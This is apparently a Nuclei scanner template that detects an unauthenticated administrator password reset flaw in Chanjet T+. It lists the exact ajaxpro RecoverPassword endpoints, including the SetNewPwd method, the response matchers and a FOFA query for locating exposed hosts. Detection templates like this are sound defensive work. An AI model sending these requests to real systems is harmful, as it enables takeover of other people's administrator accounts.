id: chanjet-tplus-unauth-passreset

info:
  name: Chanjet Tplus - Unauthorized Password Reset
  author: 0xr2r
  severity: high
  description: |
    There is an unauthorized administrator password modification vulnerability in UF Chanjet T+ RecoverPassword.aspx. An attacker can use this vulnerability to modify the administrator account password to log in to the backend.
  reference:
    - https://cn-sec.com/archives/1377207.html
    - https://www.chanjet.com
  metadata:
    max-request: 2
    verified: true
    fofa-query: app="畅捷通-TPlus"
  tags: tplus,unauth,chanjet

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}"
      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'tplus”应用程序中的服务器错误')"
          - "!contains(body_2, '>请重新登录')"
        condition: and
# digest: 4a0a004730450220196561bdf0315ff002edd2dc6b8f06301ec41ce768ac8d6c35924d431022b2cf022100f055d89d18959e389d8e5737f54ba35089dc0756d78b21a2a0358d536f1ab8ed:922c64590222798bb761d5b6d8e72950